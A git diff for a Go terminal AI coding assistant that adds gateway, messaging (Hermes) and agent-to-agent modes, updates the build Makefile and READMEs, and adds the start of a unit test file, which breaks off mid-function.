diff --git a/.gitignore b/.gitignore
index 4b54b70..b56f783 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,8 @@
 # Binaries
 bin/
+npm/bin/
+!npm/bin/
+!npm/bin/vibecoding
 *.exe
 *.exe~
 *.dll
@@ -31,4 +34,4 @@ dist/
 npm/*.tgz
 *.png
 internal/vendored/bin/
-.vibe
\ No newline at end of file
+.vibe
diff --git a/AGENTS.md b/AGENTS.md
index 71a336a..2f5fb89 100644
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -8,7 +8,7 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - UI: Bubble Tea + Lipgloss
 - CLI: Cobra
 - Default working style: terminal-first, tool-driven
-- Main purpose: a terminal AI coding assistant with provider abstraction, sessions, tools, sandboxing, context files, and skills
+- Main purpose: a terminal AI coding assistant with provider abstraction, sessions, tools, sandboxing, context files, skills, and an OpenAI-compatible HTTP gateway
 
 ## Important Directories
 
@@ -17,6 +17,9 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - `internal/config/` — settings and defaults
 - `internal/context/` — context window and compaction
 - `internal/contextfiles/` — `AGENTS.md` / `CLAUDE.md` discovery
+- `internal/hermes/` — Hermes messaging gateway mode
+- `internal/memory/` — persistent memory (memory.md)
+- `internal/messaging/` — messaging platform abstraction (wechat, feishu)
 - `internal/provider/` — provider abstraction and implementations
 - `internal/provider/factory/` — shared provider/model construction from config
 - `internal/provider/vendor*.go` — vendor adapter registry and per-vendor defaults
@@ -26,6 +29,8 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - `internal/tools/` — built-in tools
 - `internal/tui/` — terminal UI
 - `internal/acp/` — ACP / MCP related integration
+- `internal/a2a/` — A2A (Agent-to-Agent) protocol server and master mode
+- `internal/gateway/` — OpenAI-compatible HTTP gateway mode
 - `internal/vendored/` — embedded `rg` / `fd`
 - `docs/` — documentation
 
@@ -42,6 +47,36 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - Context files and skills are first-class prompt inputs.
 - Sessions are stored as JSONL with parent/child relationships.
 
+### Gateway Mode
+
+- `internal/gateway/` implements an HTTP server exposing a standard OpenAI Chat Completions API.
+- Gateway reuses the same agent loop, provider factory, session, tools, sandbox, and skills as CLI/ACP — no separate agent logic.
+- Configuration lives in `gateway.json` (global `~/.config/vibecoding/gateway.json`, project `.vibe/gateway.json`), separate from `settings.json`.
+- Project-level `.vibe/gateway.json` overrides global, same pattern as `.vibe/settings.json`.
+- Gateway supports slash commands (`/clear`, `/mode`, `/compact`, etc.) processed at the HTTP layer without invoking the LLM.
+- Tool output visibility (`toolVisibility.mode` + `toolVisibility.detail`) is configurable: collapsed (default, one-line summary) or expanded (full code fences).
+- `edit`/`write` diffs and errors always show in full regardless of detail level.
+- When `x_session_id` is empty, the gateway reuses a default session so consecutive requests share context.
+- Security: three independent layers — Bearer token auth, `allowedWorkDirs` whitelist, sandbox (bwrap).
+- No external HTTP framework; uses `net/http` standard library.
+
+### Hermes Mode
+
+- `internal/hermes/` implements a messaging gateway for WeChat/Feishu/WebSocket with persistent agent sessions.
+- Hermes reuses the same agent loop, provider factory, session, tools, sandbox, skills, and MCP as CLI/ACP.
+- Configuration lives in `hermes.json` (global `<GLOBAL_DIR>/hermes.json`, project `.vibe/hermes.json`).
+- Per-user sessions stored in `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`.
+- Default mode is `yolo` (not `agent`) — messaging platforms are unattended by nature.
+- `default_provider` / `default_model` in hermes.json override settings.json; CLI `-p`/`-m` override hermes.json.
+- `multi_agent` enables sub-agent tools (spawn/status/send/destroy).
+- `sandbox` enables bwrap sandbox (default off).
+- MCP servers from global/project `mcp.json` are loaded per-session and auto-closed on removal.
+- memory.md defaults to project directory (`.vibe/memory.md`); only uses global when `memory.path` is explicitly set.
+- Progress events (tool execution + thinking) are sent to messaging platforms via `InboundMessage.ProgressFunc`.
+- The `messaging.InboundMessage.ProgressFunc` callback is set by each platform bot; nil means no progress updates.
+- `formatToolProgress` in `dispatcher.go` formats tool events as `[tool]: args ✅/❌`.
+- Think deltas are accumulated and flushed as `💭 ...` (truncated to 500 chars) before tool/text events.
+
 ## Working Rules
 
 - Read before editing.
@@ -65,18 +100,29 @@ Built-in tools include:
 - `read`, `write`, `edit`
 - `bash`, `jobs`, `kill`
 - `grep`, `find`, `ls`
+- `plan`, `question` (TUI plan mode only)
 - `skill_ref`
 
-`grep` and `find` are backed by embedded `rg` and `fd` binaries in `internal/vendored/`.
+`grep` and `find` are backed by embedded `rg` and `fd` binaries in `internal/vendored/`. On unsupported architectures (e.g., loong64), they automatically fall back to system `grep` / `find`.
 
 ## Modes and Safety
 
-- `plan`: read-only tools
+- `plan`: read-only tools + `question` (interactive, TUI only)
 - `agent`: file edits allowed; `bash` usually requires approval
 - `yolo`: all tools auto-execute
 
+The `question` tool is only registered in TUI + plan mode. It uses the `QuestionHandler` optional interface (type assertion) to avoid polluting the public `Agent` interface. Gateway/Hermes/ACP never register or expose it.
+
 When changing code, prefer the least risky approach that satisfies the request.
 
+## Gateway-Specific Notes
+
+- Gateway-only config belongs in `internal/gateway/config.go`, not in `internal/config/settings.go`.
+- Tool output formatting (collapsed/expanded, markdown code fences) belongs in `internal/gateway/tool_format.go`.
+- Slash command handlers belong in `internal/gateway/commands.go`, kept separate from TUI commands (different dependencies).
+- The `resolveToolEvent()` helper in `handler_chat.go` handles the fact that `EventToolCall` carries tool name in `ev.ToolCall.Name` (not `ev.ToolName`).
+- When adding new slash commands, add to both gateway `commands.go` and TUI `commands.go` to keep feature parity.
+
 ## Docs and Release Notes
 
 - Put changelog updates only in:
@@ -101,5 +147,5 @@ Common commands:
 
 ## Versioning Note
 
-Current version: `v0.1.25`
-Next version: `v0.1.26`
+Current version: `v0.1.31`
+Next version: `v0.1.32`
diff --git a/Makefile b/Makefile
index 1773444..1a84987 100644
--- a/Makefile
+++ b/Makefile
@@ -1,20 +1,34 @@
 .PHONY: help build build-all install test test-vendored lint fmt clean run
-.PHONY: build-linux build-linux-musl build-darwin build-windows
+.PHONY: build-linux build-linux-loong64 build-linux-musl build-darwin build-windows
 .PHONY: dist dist-linux dist-darwin dist-windows dist-deb dist-tarball dist-zip
+.PHONY: dist-linux-loong64
 .PHONY: clean-all checksums
-.PHONY: npm-version npm-publish npm-publish-all npm-pack npm-pack-all
+.PHONY: npm-version npm-binaries npm-packages npm-pack npm-publish-all npm-publish-pre npm-publish
 .PHONY: prepare-vendored
 
 # Variables
 BINARY_NAME=vibecoding
-VERSION=$(shell git describe --tags --always --dirty 2>/dev/null || echo "dev")
-LDFLAGS=-ldflags "-X main.version=$(VERSION) -X github.com/startvibecoding/vibecoding/internal/ua.Version=$(VERSION)"
+VERSION=$(shell git describe --tags --always 2>/dev/null || echo "dev")
+LDFLAGS=-ldflags "-s -w -X main.version=$(VERSION) -X github.com/startvibecoding/vibecoding/internal/ua.Version=$(VERSION)"
+GOBUILD_FLAGS=-trimpath
 DIST_DIR=dist
 CHECKSUM_FILE=$(DIST_DIR)/checksums.txt
 
-# Platforms and architectures
-PLATFORMS=linux darwin windows
-ARCHS=amd64 arm64
+# UPX compression (skip for macOS - not supported)
+USE_UPX ?= true
+ifeq ($(shell which upx 2>/dev/null),)
+USE_UPX = false
+endif
+ifeq ($(USE_UPX),true)
+UPX_CMD = upx -9
+else
+UPX_CMD = @true
+endif
+
+# Platforms and architectures (for reference)
+# linux: amd64 arm64 loong64
+# darwin: amd64 arm64
+# windows: amd64 arm64
 
 # Default target
 help:
@@ -22,7 +36,8 @@ help:
 	@echo ""
 	@echo "Build targets:"
 	@echo "  build            Build for current platform"
-	@echo "  build-linux      Build for Linux (amd64, arm64)"
+	@echo "  build-linux      Build for Linux (amd64, arm64, loong64)"
+	@echo "  build-linux-loong64 Build for Linux LoongArch64"
 	@echo "  build-linux-musl Build for Linux musl (amd64)"
 	@echo "  build-darwin     Build for macOS (amd64, arm64)"
 	@echo "  build-windows    Build for Windows (amd64, arm64)"
@@ -34,15 +49,19 @@ help:
 	@echo "  dist-linux     Build Linux packages (tar.gz + deb)"
 	@echo "  dist-darwin    Build macOS packages (tar.gz)"
 	@echo "  dist-windows   Build Windows packages (zip)"
+	@echo "  dist-linux-loong64 Build Linux LoongArch64 packages"
 	@echo "  dist-deb       Build Debian packages only"
 	@echo "  dist-tarball   Build tarball packages only"
 	@echo "  dist-zip       Build zip packages only"
 	@echo ""
 	@echo "NPM targets:"
 	@echo "  npm-version       Sync version to npm package"
+	@echo "  npm-packages      Build platform-specific npm packages"
 	@echo "  npm-pack          Pack main + all platform packages"
 	@echo "  npm-publish-all   Publish main + all platform packages"
-	@echo "  npm-publish       Publish main package only (legacy)"
+	@echo "  npm-publish-pre   Publish pre-release packages"
+	@echo "  npm-binaries      [Legacy] Build all binaries into single package"
+	@echo "  npm-publish       [Legacy] Publish main package only"
 	@echo ""
 	@echo "Other targets:"
 	@echo "  install        Install via go install"
@@ -61,31 +80,44 @@ prepare-vendored:
 
 # Build for current platform (requires prepare-vendored first)
 build: prepare-vendored
-	go build $(LDFLAGS) -o bin/$(BINARY_NAME) ./cmd/vibecoding
+	go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME) ./cmd/vibecoding
 
 # Platform builds
-build-linux:
+build-linux: prepare-vendored
 	@echo "Building for Linux..."
 	@mkdir -p bin
-	GOOS=linux GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-amd64 ./cmd/vibecoding
-	GOOS=linux GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-arm64 ./cmd/vibecoding
+	GOOS=linux GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-amd64 ./cmd/vibecoding
+	GOOS=linux GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-arm64 ./cmd/vibecoding
+	GOOS=linux GOARCH=loong64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-loong64 ./cmd/vibecoding
+	@echo "Compressing Linux amd64 binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-linux-amd64
+
+build-linux-loong64: prepare-vendored
+	@echo "Building for Linux LoongArch64..."
+	@mkdir -p bin
+	GOOS=linux GOARCH=loong64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-loong64 ./cmd/vibecoding
 
-build-linux-musl:
+# musl: static build with CGO_ENABLED=0, arm64 not commonly needed
+build-linux-musl: prepare-vendored
 	@echo "Building for Linux musl..."
 	@mkdir -p bin
-	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-musl-amd64 ./cmd/vibecoding
+	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-musl-amd64 ./cmd/vibecoding
+	@echo "Compressing Linux musl binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-linux-musl-amd64
 
-build-darwin:
+build-darwin: prepare-vendored
 	@echo "Building for macOS..."
 	@mkdir -p bin
-	GOOS=darwin GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-amd64 ./cmd/vibecoding
-	GOOS=darwin GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-arm64 ./cmd/vibecoding
+	GOOS=darwin GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-amd64 ./cmd/vibecoding
+	GOOS=darwin GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-arm64 ./cmd/vibecoding
 
-build-windows:
+build-windows: prepare-vendored
 	@echo "Building for Windows..."
 	@mkdir -p bin
-	GOOS=windows GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-amd64.exe ./cmd/vibecoding
-	GOOS=windows GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-arm64.exe ./cmd/vibecoding
+	GOOS=windows GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-amd64.exe ./cmd/vibecoding
+	GOOS=windows GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-arm64.exe ./cmd/vibecoding
+	@echo "Compressing Windows amd64 binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-windows-amd64.exe
 
 # Build all platforms
 build-all: prepare-vendored build-linux build-linux-musl build-darwin build-windows
@@ -95,7 +127,7 @@ build-all: prepare-vendored build-linux build-linux-musl build-darwin build-wind
 
 # Install
 install:
-	go install $(LDFLAGS) ./cmd/vibecoding
+	go install $(GOBUILD_FLAGS) $(LDFLAGS) ./cmd/vibecoding
 
 # Test
 test: prepare-vendored test-vendored
@@ -103,9 +135,10 @@ test: prepare-vendored test-vendored
 
 test-vendored:
 	@case "$$(go env GOOS)-$$(go env GOARCH)" in \
-		windows-*) ext=".exe" ;; \
-		*) ext="" ;; \
+		linux-amd64|linux-arm64|darwin-amd64|darwin-arm64|windows-amd64|windows-arm64) ;; \
+		*) echo "Vendored rg/fd unsupported for $$(go env GOOS)-$$(go env GOARCH); system grep/find fallback will be used."; exit 0 ;; \
 	esac; \
+	case "$$(go env GOOS)" in windows) ext=".exe" ;; *) ext="" ;; esac; \
 	dir="internal/vendored/bin/$$(go env GOOS)-$$(go env GOARCH)"; \
 	if [ ! -f "$$dir/rg$$ext" ] || [ ! -f "$$dir/fd$$ext" ]; then \
 		echo "Missing vendored rg/fd for $$(go env GOOS)-$$(go env GOARCH)."; \
@@ -129,29 +162,32 @@ clean:
 # Clean all
 clean-all: clean
 	rm -rf $(DIST_DIR)
+	rm -f npm/*.tgz
 
 # Run
 run: build
 	./bin/$(BINARY_NAME)
 
 # Distribution: tar.gz for Linux and macOS
-dist-tarball: prepare-vendored build-linux build-linux-musl build-darwin
+dist-tarball: build-linux build-linux-musl build-darwin
 	@echo ""
 	@echo "Creating tarball packages..."
-	@for os in linux darwin; do \
-		for arch in amd64 arm64; do \
-			echo "  Packaging $(BINARY_NAME)-$${os}-$${arch}.tar.gz..."; \
-			./scripts/build-tarball.sh $${os} $${arch} $(VERSION); \
-		done; \
+	@for arch in amd64 arm64 loong64; do \
+		echo "  Packaging $(BINARY_NAME)-linux-$${arch}.tar.gz..."; \
+		./scripts/build-tarball.sh linux $${arch} $(VERSION); \
+	done
+	@for arch in amd64 arm64; do \
+		echo "  Packaging $(BINARY_NAME)-darwin-$${arch}.tar.gz..."; \
+		./scripts/build-tarball.sh darwin $${arch} $(VERSION); \
 	done
 	@echo "  Packaging $(BINARY_NAME)-linux-musl-amd64.tar.gz..."; \
 	./scripts/build-tarball.sh linux-musl amd64 $(VERSION)
 
 # Distribution: deb for Linux
-dist-deb: prepare-vendored build-linux build-linux-musl
+dist-deb: build-linux build-linux-musl
 	@echo ""
 	@echo "Creating Debian packages..."
-	@for arch in amd64 arm64; do \
+	@for arch in amd64 arm64 loong64; do \
 		echo "  Packaging $(BINARY_NAME)_$(VERSION)_$${arch}.deb..."; \
 		./scripts/build-deb.sh $${arch} $(VERSION); \
 	done
@@ -159,7 +195,7 @@ dist-deb: prepare-vendored build-linux build-linux-musl
 	./scripts/build-deb.sh amd64-musl $(VERSION)
 
 # Distribution: zip for Windows
-dist-zip: prepare-vendored build-windows
+dist-zip: build-windows
 	@echo ""
 	@echo "Creating Windows zip packages..."
 	@for arch in amd64 arm64; do \
@@ -171,6 +207,13 @@ dist-zip: prepare-vendored build-windows
 dist-linux: dist-deb dist-tarball
 	@echo "Linux packages complete!"
 
+dist-linux-loong64: build-linux-loong64
+	@echo ""
+	@echo "Creating Linux LoongArch64 packages..."
+	./scripts/build-tarball.sh linux loong64 $(VERSION)
+	./scripts/build-deb.sh loong64 $(VERSION)
+	@echo "Linux LoongArch64 packages complete!"
+
 dist-darwin: dist-tarball
 	@echo "macOS packages complete!"
 
@@ -205,8 +248,9 @@ dist: dist-linux dist-darwin dist-windows checksums
 npm-version:
 	./scripts/sync-npm-version.sh $(VERSION)
 
-# Legacy: build all binaries into single package
+# Legacy: build all binaries into single package (use npm-packages instead)
 npm-binaries: build-all
+	@echo "WARNING: npm-binaries is deprecated, use npm-packages instead" >&2
 	./scripts/build-npm.sh
 
 # Build platform-specific packages
@@ -253,6 +297,7 @@ npm-publish-pre: npm-version npm-packages
 	cd npm && npm publish --tag next
 	@echo "Published all packages (pre-release)!"
 
-# Legacy: publish main package only
+# Legacy: publish main package only (use npm-publish-all instead)
 npm-publish: npm-version npm-binaries
+	@echo "WARNING: npm-publish is deprecated, use npm-publish-all instead" >&2
 	cd npm && npm publish --tag latest
diff --git a/README.md b/README.md
index a03555f..c650ac5 100644
--- a/README.md
+++ b/README.md
@@ -8,6 +8,10 @@
   A terminal-based AI coding assistant written in ~10,000 lines of Go, inspired by <a href="https://pi.dev">pi.dev</a>
 </p>
 
+<p align="center">
+  Progressive and agile vibe-coding tool. No need to re-deploy Claude Code 、 codex、Claw、Hermes; everything is packed into a single file.
+</p>
+
 <p align="center">
   <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
   <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
@@ -23,6 +27,7 @@
 - **SSE Streaming**: Real-time token streaming for fast response delivery
 - **Think Mode**: Extended thinking/reasoning support (DeepSeek reasoning)
 - **Multi-Agent Workflows**: Optional `--multi-agent` mode with delegated sub-agents and cron command entry points
+- **A2A Master Mode**: Optional `--enable-a2a-master` mode to manage multiple remote A2A agents via `a2a-list.json`, registers `a2a_dispatch` tool for automatic task dispatch
 - **Three Modes**:
   - 🗒️ **Plan** — Read-only analysis and planning. Sandboxed, no file writes
   - 🔧 **Agent** (default) — Controlled read/write access to the project. Bash requires approval (configurable whitelist). Sandboxed, no network
@@ -151,8 +156,7 @@ vibecoding --no-sandbox
 
 | Location | Platform | Scope |
 |----------|----------|-------|
-| `~/.vibecoding/settings.json` | Linux | Global (all projects) |
-| `~/Library/Application Support/vibecoding/settings.json` | macOS | Global (all projects) |
+| `~/.vibecoding/settings.json` | Linux/macOS | Global (all projects) |
 | `%APPDATA%\vibecoding\settings.json` | Windows | Global (all projects) |
 | `.vibe/settings.json` | All | Project (overrides global) |
 
@@ -246,6 +250,7 @@ Flags:
   -M, --mode string        Mode (plan, agent, yolo)
   -t, --thinking string    Thinking level (off, minimal, low, medium, high, xhigh)
       --multi-agent        Enable multi-agent tools and commands
+      --enable-a2a-master   Enable A2A master mode (remote agent dispatch)
   -c, --continue           Continue most recent session
   -r, --resume string      Resume session by ID or path
       --session string     Use specific session file or ID
@@ -296,26 +301,46 @@ make dist       # Build distribution packages (.deb, .tar.gz)
 vibecoding/
 ├── cmd/vibecoding/        # CLI entry point
 ├── internal/
+│   ├── a2a/               # A2A protocol server and master mode
+│   ├── acp/               # ACP / MCP integration
 │   ├── agent/             # Core agent loop
 │   ├── config/            # Configuration system
 │   ├── context/           # Context management and token estimation
 │   ├── contextfiles/      # Context file discovery (AGENTS.md, CLAUDE.md, etc.)
+│   ├── cron/              # Scheduled tasks for multi-agent workflows
+│   ├── gateway/           # OpenAI-compatible HTTP gateway
+│   ├── hermes/            # Messaging gateway (WeChat/Feishu/WebSocket)
+│   ├── mcp/               # MCP server integration
+│   ├── memory/            # Persistent memory (memory.md)
+│   ├── messaging/         # Messaging platform abstraction
 │   ├── platform/          # Cross-platform compatibility utilities
 │   ├── provider/          # LLM provider abstraction
 │   │   ├── factory/       # Shared provider/model construction
 │   │   ├── openai/        # OpenAI Chat Completions API
 │   │   ├── anthropic/     # Anthropic Messages API
 │   │   └── vendor*.go     # Vendor adapter registry and defaults
-│   ├── cron/              # Scheduled tasks for multi-agent workflows
 │   ├── sandbox/           # Sandbox (bwrap) implementation
 │   ├── session/           # Session management (JSONL)
 │   ├── skills/            # Skills system
 │   ├── tools/             # Tool implementations
 │   ├── tui/               # Terminal UI (BubbleTea)
-│   └── ua/                # User-Agent string generation
+│   ├── ua/                # User-Agent string generation
+│   └── vendored/          # Embedded binaries (rg, fd)
 └── pkg/sdk/               # Public SDK interface
 ```
 
+### Running Modes
+
+```
+vibecoding                    # Interactive terminal (TUI)
+vibecoding -p "..."           # Non-interactive print mode
+vibecoding acp                # ACP stdio agent (editor integration)
+vibecoding gateway            # OpenAI-compatible HTTP gateway
+vibecoding hermes             # Messaging gateway (WeChat/Feishu/WebSocket)
+vibecoding a2a start          # A2A protocol server (standalone)
+vibecoding --enable-a2a-master  # A2A master mode (remote agent dispatch)
+```
+
 ## License
 
 MIT
diff --git a/README_zh.md b/README_zh.md
index e21d499..f3a5226 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -8,6 +8,10 @@
   一个基于终端的 AI 编码助手，使用约 10,000 行 Go 代码编写，灵感来源于 <a href="https://pi.dev">pi.dev</a>
 </p>
 
+<p align="center">
+  主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，无需重复搭建部署 Claude Code 、 codex、Claw、Hermes 环境。
+</p>
+
 <p align="center">
   <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
   <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
@@ -23,6 +27,7 @@
 - **SSE 流式传输**：实时令牌流式传输，快速响应
 - **思考模式**：扩展思考/推理支持（DeepSeek 推理）
 - **多 Agent 工作流**：可选 `--multi-agent` 模式，支持委托子 Agent 和 cron 命令入口
+- **A2A Master 模式**：可选 `--enable-a2a-master` 模式，通过 `a2a-list.json` 管理多个远程 A2A Agent，注册 `a2a_dispatch` tool 自动分发任务
 - **三种模式**：
   - 🗒️ **计划** — 只读分析和规划。沙箱化，无文件写入
   - 🔧 **代理**（默认）— 对项目的受控读写访问。Bash 需要批准（可配置白名单）。沙箱化，无网络
@@ -241,6 +246,7 @@ vibecoding [标志] [消息...]
   -M, --mode string        模式 (plan, agent, yolo)
   -t, --thinking string    思考级别 (off, minimal, low, medium, high, xhigh)
       --multi-agent        启用多 Agent 工具和命令
+      --enable-a2a-master   启用 A2A Master 模式（远程 agent 调度）
   -c, --continue           继续最近会话
   -r, --resume string      通过 ID 或路径恢复会话
       --session string     使用特定会话文件或 ID
@@ -291,26 +297,46 @@ make dist       # 构建分发包 (.deb, .tar.gz)
 vibecoding/
 ├── cmd/vibecoding/        # CLI 入口点
 ├── internal/
-│   ├── agent/             # 核心代理循环
+│   ├── a2a/               # A2A 协议服务器与 Master 模式
+│   ├── acp/               # ACP / MCP 集成
+│   ├── agent/             # 核心 Agent 循环
 │   ├── config/            # 配置系统
 │   ├── context/           # 上下文管理和令牌估算
 │   ├── contextfiles/      # 上下文文件发现 (AGENTS.md, CLAUDE.md 等)
+│   ├── cron/              # 多 Agent 工作流的定时任务
+│   ├── gateway/           # OpenAI 兼容 HTTP 网关
+│   ├── hermes/            # 消息平台网关 (微信/飞书/WebSocket)
+│   ├── mcp/               # MCP 服务器集成
+│   ├── memory/            # 持久化记忆 (memory.md)
+│   ├── messaging/         # 消息平台抽象
 │   ├── platform/          # 跨平台兼容性工具
 │   ├── provider/          # LLM 提供商抽象
 │   │   ├── factory/       # 共享 provider/model 创建逻辑
 │   │   ├── openai/        # OpenAI Chat Completions API
 │   │   ├── anthropic/     # Anthropic Messages API
 │   │   └── vendor*.go     # 厂商适配注册和默认值
-│   ├── cron/              # 多 Agent 工作流的定时任务
 │   ├── sandbox/           # 沙箱 (bwrap) 实现
 │   ├── session/           # 会话管理 (JSONL)
 │   ├── skills/            # 技能系统
 │   ├── tools/             # 工具实现
 │   ├── tui/               # 终端界面 (BubbleTea)
-│   └── ua/                # 用户代理字符串生成
+│   ├── ua/                # 用户代理字符串生成
+│   └── vendored/          # 内嵌二进制 (rg, fd)
 └── pkg/sdk/               # 公共 SDK 接口
 ```
 
+### 运行模式
+
+```
+vibecoding                    # 交互式终端 (TUI)
+vibecoding -p "..."           # 非交互打印模式
+vibecoding acp                # ACP stdio 代理 (编辑器集成)
+vibecoding gateway            # OpenAI 兼容 HTTP 网关
+vibecoding hermes             # 消息平台网关 (微信/飞书/WebSocket)
+vibecoding a2a start          # A2A 协议服务器 (独立模式)
+vibecoding --enable-a2a-master  # A2A Master 模式 (远程 agent 调度)
+```
+
 ## 许可证
 
 MIT
diff --git a/agent/agent_test.go b/agent/agent_test.go
new file mode 100644
index 0000000..49a7a1d
--- /dev/null
+++ b/agent/agent_test.go
@@ -0,0 +1,705 @@
+package agent
+
+import (
+	"context"
+	"testing"
+)
+
+// MockProvider is a mock implementation of Provider for testing.
+type MockProvider struct {
+	nameVal   string
+	modelsVal []ModelInfo
+	chatChan  chan StreamEvent
+}
+
+func NewMockProvider(name string, models []ModelInfo) *MockProvider {
+	return &MockProvider{
+		nameVal:   name,
+		modelsVal: models,
+		chatChan:  make(chan StreamEvent, 10),
+	}
+}
+
+func (m *MockProvider) Chat(ctx context.Context, params ChatParams) <-chan StreamEvent {
+	go func() {
+		defer close(m.chatChan)
+		m.chatChan <- StreamEvent{Type: StreamDone, StopReason: "stop"}
+	}()
+	return m.chatChan
+}
+
+func (m *MockProvider) Name() string {
+	return m.nameVal
+}
+
+func (m *MockProvider) Models() []ModelInfo {
+	return m.modelsVal
+}
+
+func (m *MockProvider) GetModel(id string) *ModelInfo {
+	for i := range m.modelsVal {
+		if m.modelsVal[i].ID == id {
+			return &m.modelsVal[i]
+		}
+	}
+	return nil
+}
+
+// ============ types.go tests ============
+
+func TestNewUserMessage(t *testing.T) {
+	msg := NewUserMessage("hello")
+	if msg.Role != RoleUser {
+		t.Errorf("expected role user, got %v", msg.Role)
+	}
+	if msg.Content != "hello" {
+		t.Errorf("expected content 'hello', got %q", msg.Content)
+	}
+}
+
+func TestNewAssistantTextMessage(t *testing.T) {
+	msg := NewAssistantTextMessage("response")
+	if msg.Role != RoleAssistant {
+		t.Errorf("expected role assistant, got %v", msg.Role)
+	}
+	if msg.Content != "response" {
+		t.Errorf("expected content 'response', got %q", msg.Content)
+	}
+}
+
+func TestNewAssistantMessage(t *testing.T) {
+	contents := []ContentBlock{
+		{Type: "text", Text: "hello"},
+		{Type: "thinking", Thinking: "let me think"},
+	}
+	msg := NewAssistantMessage(contents)
+	if msg.Role != RoleAssistant {
+		t.Errorf("expected role assistant, got %v", msg.Role)
+	}
+	if len(msg.Contents) != 2 {
+		t.Errorf("expected 2 contents, got %d", len(msg.Contents))
+	}
+}
+
+func TestNewToolResultMessage(t *testing.T) {
+	msg := NewToolResultMessage("call-123", "bash", "output", false)
+	if msg.Role != RoleToolResult {
+		t.Errorf("expected role toolResult, got %v", msg.Role)
+	}
+	if msg.ToolCallID != "call-123" {
+		t.Errorf("expected toolCallID 'call-123', got %q", msg.ToolCallID)
+	}
+	if msg.ToolName != "bash" {
+		t.Errorf("expected toolName 'bash', got %q", msg.ToolName)
+	}
+	if msg.Content != "output" {
+		t.Errorf("expected content 'output', got %q", msg.Content)
+	}
+	if msg.IsError {
+		t.Error("expected IsError to be false")
+	}
+}
+
+func TestNewToolResultMessageWithError(t *testing.T) {
+	msg := NewToolResultMessage("call-456", "read", "error occurred", true)
+	if !msg.IsError {
+		t.Error("expected IsError to be true")
+	}
+}
+
+func TestNewToolResultMessageWithContents(t *testing.T) {
+	contents := []ContentBlock{
+		{Type: "text", Text: "result"},
+	}
+	msg := NewToolResultMessageWithContents("call-789", "write", "done", contents, false)
+	if msg.Role != RoleToolResult {
+		t.Errorf("expected role toolResult, got %v", msg.Role)
+	}
+	if len(msg.Contents) != 1 {
+		t.Errorf("expected 1 content, got %d", len(msg.Contents))
+	}
+}
+
+func TestNewSystemInjectedUserMessage(t *testing.T) {
+	msg := NewSystemInjectedUserMessage("system prompt")
+	if msg.Role != RoleUser {
+		t.Errorf("expected role user, got %v", msg.Role)
+	}
+	if !msg.SystemInjected {
+		t.Error("expected SystemInjected to be true")
+	}
+}
+
+func TestUsageCalculateCost(t *testing.T) {
+	usage := &Usage{
+		InputTokens:  1000,
+		OutputTokens: 500,
+		CacheRead:    100,
+		CacheWrite:   50,
+	}
+
+	usage.CalculateCost(0.27, 1.10, 0.10, 0.27)
+
+	if usage.Cost.Input <= 0 {
+		t.Error("expected positive input cost")
+	}
+	if usage.Cost.Output <= 0 {
+		t.Error("expected positive output cost")
+	}
+	if usage.Cost.Total <= 0 {
+		t.Error("expected positive total cost")
+	}
+
+	expectedInput := 0.00027
+	if diff(usage.Cost.Input, expectedInput) > 0.0001 {
+		t.Errorf("expected input cost %.6f, got %.6f", expectedInput, usage.Cost.Input)
+	}
+}
+
+func TestRoleConstants(t *testing.T) {
+	if RoleUser != "user" {
+		t.Errorf("expected user, got %q", RoleUser)
+	}
+	if RoleAssistant != "assistant" {
+		t.Errorf("expected assistant, got %q", RoleAssistant)
+	}
+	if RoleToolResult != "toolResult" {
+		t.Errorf("expected toolResult, got %q", RoleToolResult)
+	}
+	if RoleSystem != "system" {
+		t.Errorf("expected system, got %q", RoleSystem)
+	}
+}
+
+func TestContextUsage(t *testing.T) {
+	usage := &ContextUsage{
+		Tokens:        50000,
+		ContextWindow: 128000,
+	}
